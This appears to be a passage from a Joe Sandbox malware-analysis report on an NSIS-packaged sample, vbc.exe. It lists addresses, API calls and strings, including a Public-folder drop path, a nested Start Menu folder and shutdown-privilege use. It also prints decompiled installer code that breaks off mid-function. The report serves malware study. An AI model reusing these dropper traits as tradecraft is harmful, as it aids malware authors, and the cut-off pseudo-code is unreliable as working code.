0x00403504
0x00403518
0x0040351d
0x0040351f
0x00403523
0x00403528
0x00403528
0x00403537
0x00403539
0x0040353d
0x00403543
0x0040365a
0x00403660
0x0040366b
0x0040366d
0x00403672
0x00403674
0x004036cc
0x004036d1
0x004036db
0x004036e2
0x004036e6
0x00403797
0x00403797
0x0040379c
0x004037a2
0x004037a7
0x004038cd
0x004038d3
0x00403951
0x00403951
0x00403956
0x00403959
0x0040395b
0x0040395b
0x00403963
0x00403963
0x004038e3
0x004038e9
0x004038eb
0x004038f8
0x0040390b
0x00403913
0x0040391b
0x0040391b
0x00403923
0x00403928
0x0040392f
0x0040393d
0x00403940
0x00403946
0x00403948
0x00000000
0x00000000
0x00000000
0x00403931
0x00403937
0x00403939
0x0040393b
0x0040394a
0x0040394c
0x00000000
0x0040394c
0x00000000
0x0040393b
0x0040392f
0x004037b6
0x004037bd
0x004037bd
0x004036f2
0x00403787
0x00403787
0x00403793
0x00000000
0x00403793
0x004036ff
0x00403703
0x00403751
0x00403751
0x00403753
0x0040375b
0x004037ce
0x004037d0
0x004037d7
0x004037df
0x004037df
0x004037ea
0x004037ef
0x004037fe
0x00403802
0x00403803
0x0040380c
0x00403805
0x00403805
0x00403805
0x00403812
0x00403818
0x0040381f
0x00403827
0x00403827
0x00403835
0x00403841
0x0040384f
0x00403854
0x0040385a
0x00403866
0x0040386c
0x00403876
0x0040388c
0x0040389d
0x004038a3
0x004038aa
0x004038ad
0x004038b3
0x004038b3
0x004038aa
0x004038b7
0x004038be
0x004038be
0x004038c3
0x004038c3
0x00000000
0x004037fe
0x0040375d
0x00403760
0x0040376b
0x00000000
0x00000000
0x00403773
0x0040377e
0x00403783
0x00000000
0x00403783
0x0040370c
0x00403724
0x00403735
0x00403736
0x0040373a
0x0040373c
0x0040374a
0x0040374d
0x00000000
0x00000000
0x00000000
0x0040374d
0x0040374f
0x00000000
0x0040374f
0x0040367c
0x00403688
0x0040368d
0x00403692
0x00403694
0x00000000
0x00000000
0x0040369c
0x004036a4
0x004036b5
0x004036bd
0x004036bf
0x004036c4
0x004036c6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00403549
0x00403549
0x0040354b
0x0040354f
0x00403558
0x0040355c
0x00403561
0x00403562
0x00403562
0x00403567
0x00000000
0x0040356d
0x0040356e
0x00403573
0x00403575
0x0040357d
0x00403584
0x00403584
0x0040357d
0x00403595
0x004035a8
0x004035a9
0x004035be
0x004035c3
0x004035c7
0x004035d0
0x004035d8
0x004035df
0x004035df
0x004035d8
0x004035eb
0x004035fe
0x004035ff
0x00403614
0x0040361a
0x0040361e
0x00000000
0x00403645
0x00403645
0x0040364a
0x00403653
0x00403658
0x00403658
0x00000000
0x00403658
0x0040361e
0x00000000
0x00000000
0x00000000
0x00403551
0x00403551
0x00403552
0x00403553
0x00000000
0x00403626
0x0040362d
0x00403633
0x00403636
0x00403636
0x00403637
0x0040363a
0x00000000

APIs

SetErrorMode.KERNELBASE ref: 0040346D
GetVersion.KERNEL32 ref: 00403473
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040349C
#17.COMCTL32(00000007,00000009), ref: 004034BF
OleInitialize.OLE32(00000000), ref: 004034C6
SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 004034E2
GetCommandLineW.KERNEL32(00429240,NSIS Error), ref: 004034F7
GetModuleHandleW.KERNEL32(00000000,"C:\Users\Public\vbc.exe" ,00000000), ref: 0040350A
CharNextW.USER32(00000000), ref: 00403531

Part of subcall function 004065EC: GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
Part of subcall function 004065EC: GetProcAddress.KERNEL32(00000000,?), ref: 00406619

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040366B
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040367C
lstrcatW.KERNEL32 ref: 00403688
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 0040369C
lstrcatW.KERNEL32 ref: 004036A4
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004036B5
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004036BD
DeleteFileW.KERNEL32(1033), ref: 004036D1

Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F

OleUninitialize.OLE32 ref: 0040379C
ExitProcess.KERNEL32 ref: 004037BD
lstrcatW.KERNEL32 ref: 004037D0
lstrcatW.KERNEL32 ref: 004037DF
lstrcatW.KERNEL32 ref: 004037EA
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\Public,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\vbc.exe" ,00000000,?), ref: 004037F6
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403812
DeleteFileW.KERNEL32(00420EE8,00420EE8,?,kernel32::EnumResourceTypesW(i 0,i r1,i 0),?), ref: 0040386C
CopyFileW.KERNEL32 ref: 00403880
CloseHandle.KERNEL32(00000000), ref: 004038AD
GetCurrentProcess.KERNEL32(00000028,?), ref: 004038DC
OpenProcessToken.ADVAPI32(00000000), ref: 004038E3
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038F8
AdjustTokenPrivileges.ADVAPI32 ref: 0040391B
ExitWindowsEx.USER32(00000002,80040002), ref: 00403940
ExitProcess.KERNEL32 ref: 00403963

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93, xrefs: 0040364E, 0040376E, 00403818, 00403822
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403461
SeShutdownPrivilege, xrefs: 004038F2
\Temp, xrefs: 00403682
C:\Users\user\AppData\Local\Temp\, xrefs: 00403660, 00403665, 0040367B, 00403687, 00403696, 004036A3, 004036AF, 004036B7, 004037CD, 004037DE, 004037E9, 004037F5, 00403802, 00403811, 004038C2
Error launching installer, xrefs: 00403753
C:\Users\Public, xrefs: 004037EF, 004037F4, 00403821
UXTHEME, xrefs: 00403490, 00403495, 0040349B
NSIS Error, xrefs: 004034E8
~nsu, xrefs: 004037C8
Low, xrefs: 0040369E
1033, xrefs: 004036CC
.tmp, xrefs: 004037E4
TMP, xrefs: 004036B8
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac, xrefs: 00403779
"C:\Users\Public\vbc.exe" , xrefs: 004034FD, 00403503, 004036F9
TEMP, xrefs: 004036B0
kernel32::EnumResourceTypesW(i 0,i r1,i 0), xrefs: 00403830

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\Public\vbc.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac$C:\Users\Public$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$kernel32::EnumResourceTypesW(i 0,i r1,i 0)$~nsu
API String ID: 2488574733-3709746910
Opcode ID: 290ea68bc16bf9ba0967596cf016d677efff9e7d5fa8e06392f64e50e51ce68c
Instruction ID: 1c098c9ac5d33f9e9f606ea88917c77842503da0397251e5f420d8b791505771
Opcode Fuzzy Hash: 290ea68bc16bf9ba0967596cf016d677efff9e7d5fa8e06392f64e50e51ce68c
Instruction Fuzzy Hash: 92D107B1200301ABD7207F659D49A3B3AACEB80709F51443FF881B62D1DB7D8952CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00404CED Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00404CED(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				intOrPtr _t195;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t273;
				long _t276;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageW;
				_v20 =  *0x42a268;
				_t282 = 0;
				_v24 =  *0x42a250 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x42a259 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c)); // executed
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404C3B(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x818 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x42a258) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x42370c;
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x423720;
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x42370c = _t282;
								 *0x423720 = _t282;
								 *0x42a2a0 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x42a259 & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E00404CBB();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_v32 =  *0x423720;
									_t195 =  *0x42a268;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x42a26c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										if( *((intOrPtr*)( *0x42921c + 0x10)) != _t282) {
											E00404BF6(0x3ff, 0xfffffffb, E00404C0E(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageW(_v8, 0x113f, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x206]);
									} while (_v20 <  *0x42a26c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x423720);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageW(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageW(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x42a2a0 = _t306;
					 *0x423720 = GlobalAlloc(0x40,  *0x42a26c << 2);
					_t252 = LoadBitmapW( *0x42a240, 0x6e);
					 *0x423714 =  *0x423714 | 0xffffffff;
					_t313 = _t252;
					 *0x42371c = SetWindowLongW(_v8, 0xfffffffc, E004052E5);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42370c = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42370c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E00406234(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E004042D6(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E004042D6(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x42a26c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										_t273 = SendMessageW(_v8, 0x1132, 0,  &_v84); // executed
										 *( *0x423720 + _t316 * 4) = _t273;
									} else {
										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
									_v32 = 1;
									 *( *0x423720 + _t316 * 4) = _t276;
									_t284 =  *( *0x423720 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x818]);
							_v28 = _t302;
						} while (_t316 <  *0x42a26c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E0040430B(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E0040430B(_v12);
								L91:
								return E0040433D(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404cfc
0x00404d0d
0x00404d12
0x00404d1a
0x00404d20
0x00404d28
0x00404d36
0x00404d39
0x00404f5a
0x00404f61
0x00404f75
0x00404f63
0x00404f65
0x00404f68
0x00404f69
0x00404f70
0x00404f70
0x00404f81
0x00404f8f
0x00404f92
0x00404fa8
0x0040501d
0x00405020
0x00405022
0x0040502c
0x0040503a
0x0040503a
0x0040503c
0x00405046
0x0040504c
0x0040504f
0x00405052
0x0040506d
0x00405054
0x0040505e
0x0040505e
0x00405052
0x00405046
0x00000000
0x00405020
0x00404fad
0x00404fb8
0x00404fbd
0x00404fc4
0x00404fc9
0x00404fcd
0x00404fd8
0x00404fd8
0x00404fdc
0x00404fe0
0x00404fe4
0x00404ff7
0x00404fe6
0x00404fe6
0x00404fed
0x00404ff3
0x00404fef
0x00404fef
0x00404fef
0x00404fed
0x00404ffb
0x00404ffd
0x00405010
0x00405013
0x00405016
0x00405016
0x00404fe0
0x00000000
0x00404fcd
0x00404faf
0x00404fb6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405070
0x00405070
0x00405077
0x004050e8
0x004050f0
0x004050f8
0x004050f8
0x00405101
0x00405103
0x0040510a
0x0040510d
0x0040510d
0x00405113
0x0040511a
0x0040511d
0x0040511d
0x00405123
0x00405129
0x0040512f
0x0040512f
0x0040513c
0x00405292
0x00405299
0x004052b6
0x004052bc
0x004052ce
0x004052ce
0x00000000
0x00405142
0x00405144
0x00405149
0x0040514e
0x00405153
0x00405155
0x00405155
0x00405156
0x00405157
0x00405159
0x00405159
0x00405161
0x004051a2
0x004051a4
0x004051b4
0x004051b7
0x004051bc
0x004051c3
0x004051c6
0x00405268
0x0040526e
0x0040527c
0x0040528d
0x0040528d
0x00000000
0x0040527c
0x004051cc
0x004051cf
0x004051d5
0x004051da
0x004051dc
0x004051de
0x004051e4
0x004051eb
0x004051f0
0x004051f7
0x004051fa
0x004051fa
0x00405201
0x0040520d
0x00405211
0x00405213
0x00405213
0x00405203
0x00405205
0x00405205
0x00405233
0x0040523f
0x0040524e
0x0040524e
0x00405250
0x00405253
0x0040525c
0x00000000
0x00405163
0x0040516e
0x00405171
0x00405176
0x00405178
0x0040517c
0x0040518c
0x00405196
0x00405198
0x0040519b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040517e
0x0040517e
0x00405184
0x00405186
0x00405186
0x00405187
0x00405188
0x00000000
0x0040517e
0x00405161
0x0040513c
0x0040507f
0x00000000
0x00405095
0x0040509f
0x004050a4
0x00000000
0x00000000
0x004050b6
0x004050bb
0x004050c7
0x004050c7
0x004050c9
0x004050d8
0x004050da
0x004050de
0x004050e1
0x00000000
0x004050e1
0x0040507f
0x00404d3f
0x00404d44
0x00404d4d
0x00404d54
0x00404d62
0x00404d6d
0x00404d73
0x00404d81
0x00404d95
0x00404d9a
0x00404da7
0x00404dac
0x00404dc2
0x00404dd3
0x00404de0
0x00404de0
0x00404de3
0x00404de9
0x00404deb
0x00404dee
0x00404df3
0x00404df8
0x00404dfa
0x00404dfa
0x00404e1a
0x00404e1a
0x00404e1c
0x00404e1d
0x00404e22
0x00404e25
0x00404e28
0x00404e2c
0x00404e31
0x00404e36
0x00404e3a
0x00404e3f
0x00404e44
0x00404e46
0x00404e4e
0x00404f19
0x00404f2c
0x00000000
0x00404e54
0x00404e57
0x00404e5a
0x00404e5d
0x00404e5d
0x00404e64
0x00404e6a
0x00404e6d
0x00404e73
0x00404e74
0x00404e79
0x00404e82
0x00404e89
0x00404e8c
0x00404e8f
0x00404e92
0x00404ece
0x00404eef
0x00404ef7
0x00404ed0
0x00404edd
0x00404edd
0x00404e94
0x00404e97
0x00404ea6
0x00404eb0
0x00404eb8
0x00404ebf
0x00404ec7
0x00404ec7
0x00404e92
0x00404efd
0x00404efe
0x00404f0a
0x00404f0a
0x00404f17
0x00404f32
0x00404f36
0x00404f53
0x00404f58
0x00000000
0x00404f38
0x00404f3d
0x00404f46
0x004052d0
0x004052e2
0x004052e2
0x00404f36
0x00000000
0x00404f17
0x00404e4e

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404D05
GetDlgItem.USER32(?,00000408), ref: 00404D10
GlobalAlloc.KERNEL32(00000040,?), ref: 00404D5A
LoadBitmapW.USER32 ref: 00404D6D
SetWindowLongW.USER32 ref: 00404D86
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D9A
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404DAC
SendMessageW.USER32(?,00001109,00000002), ref: 00404DC2
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404DCE
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404DE0
DeleteObject.GDI32(00000000), ref: 00404DE3
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404E0E
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404E1A
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EB0
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404EDB
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EEF
GetWindowLongW.USER32(?,000000F0), ref: 00404F1E
SetWindowLongW.USER32 ref: 00404F2C
ShowWindow.USER32(?,00000005), ref: 00404F3D
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040503A
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040509F
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004050B4
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004050D8
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050F8
ImageList_Destroy.COMCTL32(?), ref: 0040510D
GlobalFree.KERNEL32(?), ref: 0040511D
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405196
SendMessageW.USER32(?,00001102,?,?), ref: 0040523F
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040524E
InvalidateRect.USER32(?,00000000,00000001), ref: 0040526E
ShowWindow.USER32(?,00000000), ref: 004052BC
GetDlgItem.USER32(?,000003FE), ref: 004052C7
ShowWindow.USER32(00000000), ref: 004052CE

Strings

N, xrefs: 00404F78
M, xrefs: 00404E97
, xrefs: 004052A6

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: a20ec76394ec9aa9d7ee758541d4fa6294dbf0a1b8cf6e8fb4ee4d3cfcbb4640
Instruction ID: fabf201a6726aaeed1f236dd7cd6744ceb795820712aa309ba6ddf90c5850425
Opcode Fuzzy Hash: a20ec76394ec9aa9d7ee758541d4fa6294dbf0a1b8cf6e8fb4ee4d3cfcbb4640
Instruction Fuzzy Hash: A4027DB0A00209EFDF209F54CD85AAE7BB5FB44314F50817AE610BA2E0D7799E52DF58

Uniqueness

Uniqueness Score: -1.00%

Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10001B18() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				WCHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				WCHAR* _t199;
				signed int _t202;
				void* _t204;
				void* _t206;
				WCHAR* _t208;
				void* _t216;
				struct HINSTANCE__* _t217;
				struct HINSTANCE__* _t218;
				struct HINSTANCE__* _t220;
				signed short _t222;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t227;
				void* _t228;
				intOrPtr* _t229;
				void* _t240;
				signed char _t241;
				signed int _t242;
				void* _t246;
				struct HINSTANCE__* _t248;
				void* _t249;
				signed int _t251;
				short* _t253;
				signed int _t259;
				void* _t260;
				signed int _t263;
				signed int _t266;
				signed int _t267;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				void* _t278;
				void* _t282;
				struct HINSTANCE__* _t284;
				signed int _t287;
				void _t288;
				signed int _t289;
				signed int _t301;
				signed int _t302;
				signed short _t308;
				signed int _t309;
				WCHAR* _t310;
				WCHAR* _t312;
				WCHAR* _t313;
				struct HINSTANCE__* _t314;
				void* _t316;
				signed int _t318;
				void* _t319;

				_t284 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t319 = 0;
				_v48 = 0;
				_t199 = E1000121B();
				_v24 = _t199;
				_v28 = _t199;
				_v44 = E1000121B();
				_t309 = E10001243();
				_v52 = _t309;
				_v12 = _t309;
				while(1) {
					_t202 = _v32;
					_v56 = _t202;
					if(_t202 != _t284 && _t319 == _t284) {
						break;
					}
					_t308 =  *_t309;
					_t287 = _t308 & 0x0000ffff;
					_t204 = _t287 - _t284;
					if(_t204 == 0) {
						_t33 =  &_v32;
						 *_t33 = _v32 | 0xffffffff;
						__eflags =  *_t33;
						L17:
						_t206 = _v56 - _t284;
						if(_t206 == 0) {
							__eflags = _t319 - _t284;
							 *_v28 = _t284;
							if(_t319 == _t284) {
								_t246 = GlobalAlloc(0x40, 0x1ca4); // executed
								_t319 = _t246;
